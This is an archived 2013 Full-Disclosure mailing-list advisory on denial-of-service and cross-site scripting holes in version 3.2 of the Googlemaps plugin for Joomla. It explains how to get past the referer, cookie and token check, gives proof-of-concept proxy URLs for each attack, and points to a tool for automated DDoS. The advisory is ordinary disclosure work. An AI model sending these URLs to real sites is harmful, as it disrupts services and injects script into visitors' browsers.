| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 26 Jul 2013 23:49:01 +0300 From: "MustLive" <mustlive@...security.com.ua> To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>, "1337 Exploit DataBase" <mr.inj3ct0r@...il.com> Subject: DoS and XSS vulnerabilities in Googlemaps plugin for Joomla Hello list! Earlier I wrote about multiple vulnerabilities in Googlemaps plugin for Joomla (http://securityvulns.ru/docs29645.html). After my informing, the developer fixed these vulnerabilities in versions 2.19 and 3.1 of the plugin - by removing proxy functionality. And in version 3.2 of the plugin he introduced new proxy functionality, which must be protected against previous attacks. But after my checking, I've found two holes in the last version of the plugin. These are Denial of Service and Cross-Site Scripting vulnerabilities in Googlemaps plugin for Joomla. ------------------------- Affected products: ------------------------- Vulnerable is Googlemaps plugin v3.2 for Joomla. I've informed the developer about these holes. Now he is working on a new version. ------------------------- Affected vendors: ------------------------- Mike Reumer http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147 ---------- Details: ---------- To bypass protection for accessing this script it's needed to set referer, cookie and token. The referer is current site, the cookie is set by the site (Joomla) itself and the token can be found at page which uses plugin of the site (and it's setting in URL). This data can be taken from the site automatically. Referer: http://site Cookie: dc9023a0ff4f8a00f9b2f4e7600c17f4=69c59f0263b70f9343e0a75a93bd44a0 Denial of Service (WASC-10): http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site2/large_file&1e17f7d3d74903775e5c524dbe2cd8f1=1 Besides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks with using of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-July/008879.html). Cross-Site Scripting (WASC-08): http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site2/xss.html&1e17f7d3d74903775e5c524dbe2cd8f1=1 Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists